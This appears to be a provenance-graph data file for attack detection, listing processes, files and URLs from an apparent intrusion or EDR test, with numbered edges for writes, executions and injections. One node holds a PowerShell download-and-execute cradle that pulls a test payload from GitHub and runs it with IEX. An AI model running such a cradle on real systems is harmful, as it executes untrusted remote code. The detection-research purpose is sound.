35
MP*-setup.exe
MF-C:\Users\admin\AppData\Local\Temp\RunDRT
SF-C:\Users\admin\AppData\Local\Temp\phish_alert_sp2_2
MP-sdiagnhost.exe
MP-ns9510.tmp
SF-C:\Users\admin\Desktop\11492515294
SF-C:\Program Files\Java\jre1
MP-schtasks.exe 
MP-hh.exe
MP*-Host.exe 
MF-\Users\admin\AppData\Local\Temp\06e0e36f91e621e79712673923e57daf3fcf232bb3151c122891ded30466293a.exe
TP*-AcroRd32.exe 
TP-3e5096359da3ff9944a9b85da8a000648c32e77d898b8966b242a332d8b30b1e.exe 
MF-\Users\Public\Music\mediatv.mov
TP-ExplorerSuite.exe
MF-\Users\admin\Desktop\Remittance_1021395_092023_111928.csv.txt
SO-https://mindigital-shde.gr
MF-C:\Program Files\Microsoft Office\Office14\WINWORD
MP-PowerShell.exe
MP-20af4c29ba1c8ced4a86fc73c0ad7b7c.exe 
SO-https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
MF-test.ps1
MF-\Users\admin\AppData\Local\Temp\test.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TF-\Users\admin\AppData\Local\Temp\processhacker-2.39-bin.zip
MP-Uninstall.exe 
MP-Nikki Project.scr
MP*-T1027.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
SF-C:\Windows\system32\svchost.exe
MF-C:\Windows\System32\WScript.exe
TP-o0575127.exe
MF-\Users\admin\AppData\Local\Temp\000001.tmp
TP-ExplorerSuite.tmp
SF-C:\Users\admin\Downloads\03b2f267de27dae24de14e2c258a18e6c6d11581e6caee3a6df2b7f42947d898
95
0 1 WR-1
0 2 WR-1
0 3 FR-1
3 1 WR-1
3 2 EX-1
0 4 FR-1
4 1 RD-1
4 2 EX-1
0 5 RD-1
3 5 WR-1
4 5 WR-1
0 6 WR-1
3 6 UK-1
0 7 UK-1
8 1 WR-1
8 2 WR-1
4 8 UK-1
9 1 WR-2
9 2 WR-2
9 5 WR-2
9 10 RD-2
11 1 EX-3
11 2 WR-3
11 5 RD-3
9 11 IJ-2
11 10 WR-3
12 2 RD-3
12 5 RD-3
9 12 IJ-2
12 10 RD-3
11 12 IJ-3
9 13 EX-2
11 13 WR-3
12 13 WR-3
14 5 WR-3
9 14 IJ-2
14 10 RD-3
11 14 UK-3
9 15 WR-2
12 15 WR-3
16 9 RF-2
12 16 ST-3
9 17 RD-2
12 17 EX-3
9 18 FR-2
18 10 WR-3
12 18 IJ-3
18 13 UK-3
9 19 FR-2
19 10 WR-3
12 19 IJ-3
19 15 EX-3
16 19 RF-3
19 17 WR-3
12 20 ST-3
19 20 ST-3
12 21 WR-3
19 21 EX-3
12 22 WR-3
19 22 WR-3
23 19 RF-3
19 24 WR-3
25 15 EX-3
16 25 RF-3
25 17 WR-3
19 25 UK-3
26 16 ST-3
26 17 WR-3
20 26 RF-3
26 21 WR-3
26 22 RD-3
23 26 RF-3
26 24 CD-3
27 17 WR-4
27 20 ST-4
27 21 WR-4
27 22 WR-4
27 23 ST-4
27 24 RD-4
26 28 ST-4
27 28 ST-4
26 29 WR-3
27 29 WR-4
26 30 WR-3
27 30 RD-4
31 22 WR-4
31 23 ST-4
31 24 EX-4
26 31 IJ-3
27 31 UK-4
26 32 EX-3
26 33 FR-3
28 33 RF-4
33 29 UK-4
26 34 RD-3

